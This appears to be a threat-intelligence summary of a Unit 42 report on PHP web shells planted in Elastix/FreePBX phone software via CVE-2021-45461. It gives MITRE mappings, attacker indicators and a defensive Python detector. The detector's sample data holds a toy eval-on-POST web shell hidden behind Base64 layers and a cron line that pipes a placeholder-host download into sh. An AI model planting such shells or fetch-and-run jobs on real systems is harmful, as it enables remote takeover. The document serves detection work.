Unit 42 describes a campaign targeting Elastix/Digium phones where a PHP web shell is implanted to exfiltrate data and fetch additional payloads. The activity links to a Rest Phone Apps RCE (CVE-2021-45461) and is mitigated by Palo Alto Networks WildFire and Threat Prevention. #INJ3CTOR3 #Digium #Asterisk #Elastix #FreePBX #Sangoma #CVE-2021-45461 #ZenharPanel #ZenharR
Keypoints
- Observed over 500,000 unique samples of the Digium/Elastix web-shell family from Dec 2021 to Mar 2022 targeting Digium’s Elastix/OpenPBX ecosystem.
- The attacker implants a multi-layer obfuscated PHP web shell to exfiltrate data and download/execute additional payloads inside FreePBX/Digium phone software.
- The web shell uses an MD5 authentication hash tied to the victim’s IPv4 address and supports admin, cmd, and call operations with built-in commands.
- Initial access leverages CVE-2021-45461 (Rest Phone Apps RCE) in the restapps module, enabling remote code execution via a crafted URL parameter.
- Persistence is achieved through creation of root user accounts and a scheduled task that fetches and runs a remote script every minute.
- IoCs include remote URLs, original shell SHA256 hashes, local file paths, and unique strings such as ZenharPanel and Ask Master.
MITRE Techniques
- [T1505.003] Web Shell – The attacker installs a PHP web shell backdoor and uses it to run commands and maintain access. ‘The PHP web shell contains random junk comments, in an attempt to evade signature-based defenses. Additionally, it is wrapped in multiple layers of Base64 encoding, in order to mask its true intent.’
- [T1190] Exploit Public-Facing Application – CVE-2021-45461 enables remote code execution via the Rest Phone Apps module. ‘This vulnerability lies in the Rest Phone Apps (restapps) module, allowing for a URL variable to potentially get passed, resulting in a remote code execution (RCE) scenario.’
- [T1053.005] Scheduled Task – Persistence by scheduling a task that runs every minute to fetch and execute a remote script. ‘Adds a scheduled task entry. Runs every minute.’
- [T1136] Create Account – Persistence via creation of new root user accounts (sugarmaint and supports). ‘Creation of root user accounts.’
- [T1027] Obfuscated/Compressed Files and Information – Use of Base64 encoding layers to hide payloads. ‘There are always 14 lines of code, wrapped in multiple layers of Base64 encoding to hide certain key areas.’
- [T1105] Ingress Tool Transfer – Downloading and executing additional payloads from remote infrastructure. ‘The dropper variant fetches and executes a remote script from the attacker’s infrastructure: IPv4 address 37.49.230.74.’
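As an added defender-side example (not code from Unit 42 or the report), the following Python peels nested Base64 layers out of a PHP file to flag the multi-layer obfuscation described above, and scans a crontab for every-minute fetch-and-run entries like the persistence mechanism in T1053.005. The sample PHP file and crontab are constructed here; the URL is a placeholder, not an indicator from the report.

```python
import base64
import binascii
import re

# Constructed sample (not from the report): a toy PHP page whose body sits behind
# two Base64 layers, mimicking the layering the report describes for the web shell.
INNER = b'<?php if(md5($_SERVER["REMOTE_ADDR"])===$k){eval($_POST["c"]);} ?>'
LAYER1 = base64.b64encode(INNER)
LAYER2 = base64.b64encode(b"eval(base64_decode('" + LAYER1 + b"'));")
SAMPLE_PHP = b"<?php\n// random junk comment to pad the file\neval(base64_decode('" + LAYER2 + b"'));\n"

# Constructed crontab excerpt: one benign entry, one every-minute download piped to a shell.
SAMPLE_CRONTAB = (
    "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n"
    "* * * * * curl -s http://placeholder.invalid/k.php | sh\n"
)

B64_RE = re.compile(rb"[A-Za-z0-9+/]{24,}={0,2}")
PHP_MARKERS = (b"<?php", b"eval(", b"base64_decode", b"$_POST", b"$_GET", b"$_SERVER")

def unwrap_layers(data: bytes, max_depth: int = 8) -> tuple[int, bytes]:
    """Peel Base64 blobs that decode to PHP-looking content; return (layers peeled, innermost payload)."""
    depth, current = 0, data
    while depth < max_depth:
        innermost = None
        for blob in sorted(B64_RE.findall(current), key=len, reverse=True):
            try:
                cand = base64.b64decode(blob, validate=True)
            except binascii.Error:
                continue  # not valid Base64 (e.g. a long identifier or junk comment)
            if any(m in cand for m in PHP_MARKERS):
                innermost = cand
                break
        if innermost is None:
            return depth, current
        depth, current = depth + 1, innermost
    return depth, current

def is_layered_webshell(data: bytes, min_layers: int = 2) -> bool:
    """Flag files hiding PHP behind at least min_layers of Base64 whose core evals request input."""
    depth, payload = unwrap_layers(data)
    return depth >= min_layers and b"eval(" in payload and any(v in payload for v in (b"$_POST", b"$_GET"))

def every_minute_fetchers(crontab: str) -> list[str]:
    """Return cron lines scheduled every minute that pipe a curl/wget download into a shell."""
    hits = []
    for line in crontab.splitlines():
        fields = line.split(None, 5)
        if len(fields) == 6 and fields[:5] == ["*"] * 5 and re.search(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", fields[5]):
            hits.append(line)
    return hits
```

Run `is_layered_webshell()` over the web-root paths listed under Indicators of Compromise and `every_minute_fetchers()` over root's crontab to triage a suspected host; a high layer count alone is a lead, not proof, so review the innermost payload by hand.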
Indicators of Compromise
- [URL] Remote URLs – The attacker fetches payloads from remote URLs: hxxp://37.49.230.74/k.php, hxxp://37.49.230.74/z/wr.php, hxxp://37.49.230.74/z/post/noroot.php, hxxp://37.49.230.74/z/post/root.php
- [SHA256] Original Shell Scripts – Hashes: 000a3688455edacc1dac17539797dc98f055091898a65cd520fb8459c1bc2a2a, 0012342749e3bae85a9269a93661e2eb00437c71b2bca2eaca458147f9fe8471, 001305bd3be538e50014d42f02dee55056b73a1df770e2605aded8a970091f2f, 0050232e04880fbe1d0c670b711b66bb46c32febdc9513074612c90f1f24631b, 0059d7b736dc1e61bd5b22fff601579fbc8a12b00981fdd34fd13f0fb44688b0, 0088cba19eec78daee0310854c4bf8f7efc64b89bdc7517f0a1c7ebbba673f72
- [Filepath] Local Filepaths – /var/www/html/admin/assets/ajax.php, /var/www/html/admin/assets/config.php, /var/www/html/admin/assets/js/config.php, /var/www/html/admin/modules/core/ajax.php, /var/www/html/digium_phones/ajax.php, /var/www/html/rest_phones/ajax.php
- [String] Unique Strings – ZenharPanel, ZenharR, Ask Master
Read more: https://unit42.paloaltonetworks.com/digium-phones-web-shell/